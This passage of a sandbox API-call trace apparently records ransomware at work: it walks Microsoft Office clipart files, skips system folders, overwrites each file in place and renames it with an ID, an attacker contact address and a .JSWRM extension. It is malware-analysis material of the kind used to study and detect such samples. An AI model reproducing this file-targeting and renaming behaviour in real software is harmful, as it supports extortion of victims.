lpNumberOfBytesWritten=0x345e898*=0x4c90, lpOverlapped=0x0) returned 1 [0081.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.660] CloseHandle (hObject=0x314) returned 1 [0081.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0081.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0081.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0081.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0081.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0081.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.661] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106222.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106222.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0081.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0081.661] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x864, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0106572.WMF", cAlternateFileName="")) returned 1 [0081.661] lstrcmpiW (lpString1="J0106572.WMF", lpString2=".") returned 1 [0081.661] lstrcmpiW (lpString1="J0106572.WMF", lpString2="..") returned 1 [0081.661] lstrcmpiW (lpString1="J0106572.WMF", lpString2="...") returned 1 [0081.662] lstrcmpiW (lpString1="J0106572.WMF", lpString2="windows") returned -1 [0081.662] lstrcmpiW (lpString1="J0106572.WMF", lpString2="recovery") returned -1 [0081.662] lstrcmpiW (lpString1="J0106572.WMF", lpString2="perflogs") returned -1 [0081.662] lstrcmpiW (lpString1="J0106572.WMF", lpString2="documents and settings") returned 1 [0081.662] lstrcmpiW (lpString1="J0106572.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.662] lstrcmpiW (lpString1="J0106572.WMF", lpString2="system volume information") returned -1 [0081.662] lstrcmpiW (lpString1="J0106572.WMF", lpString2="msocache") returned -1 [0081.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0081.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106572.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106572.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106572.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0081.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106572.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106572.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106572.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0081.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.663] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2148) returned 1 [0081.663] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x860) returned 0x20c6c0 [0081.663] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x860, lpOverlapped=0x0) returned 1 [0081.710] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.710] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x860, lpOverlapped=0x0) returned 1 [0081.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0081.710] CloseHandle (hObject=0x314) returned 1 [0081.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0081.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0081.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0081.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0081.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0081.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0081.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0081.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0081.711] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0081.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0081.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.712] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd04, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0106816.WMF", cAlternateFileName="")) returned 1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2=".") returned 1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="..") returned 1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="...") returned 1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="windows") returned -1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="recovery") returned -1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="perflogs") returned -1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="documents and settings") returned 1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="system volume information") returned -1 [0081.712] lstrcmpiW (lpString1="J0106816.WMF", lpString2="msocache") returned -1 [0081.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0081.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106816.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106816.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106816.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0081.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106816.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106816.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106816.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0081.713] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0081.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.713] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3332) returned 1 [0081.713] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd00) returned 0x23fc98 [0081.713] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd00, lpOverlapped=0x0) returned 1 [0081.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.715] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd00, lpOverlapped=0x0) returned 1 [0081.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0081.715] CloseHandle (hObject=0x314) returned 1 [0081.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0081.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0081.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0081.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0081.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0081.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0081.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106816.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106816.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0081.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0081.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0081.716] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x35d8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0106958.WMF", cAlternateFileName="")) returned 1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2=".") returned 1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="..") returned 1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="...") returned 1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="windows") returned -1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="recovery") returned -1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="perflogs") returned -1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="documents and settings") returned 1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="system volume information") returned -1 [0081.717] lstrcmpiW (lpString1="J0106958.WMF", lpString2="msocache") returned -1 [0081.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0081.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106958.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106958.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106958.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0081.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0081.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106958.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0106958.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0106958.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0081.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0081.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0081.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.717] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13784) returned 1 [0081.718] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x35d0) returned 0x24d210 [0081.718] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x35d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x35d0, lpOverlapped=0x0) returned 1 [0081.720] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.720] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x35d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x35d0, lpOverlapped=0x0) returned 1 [0081.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.721] CloseHandle (hObject=0x314) returned 1 [0081.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0081.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0081.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0081.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0081.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0081.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0081.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.721] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft 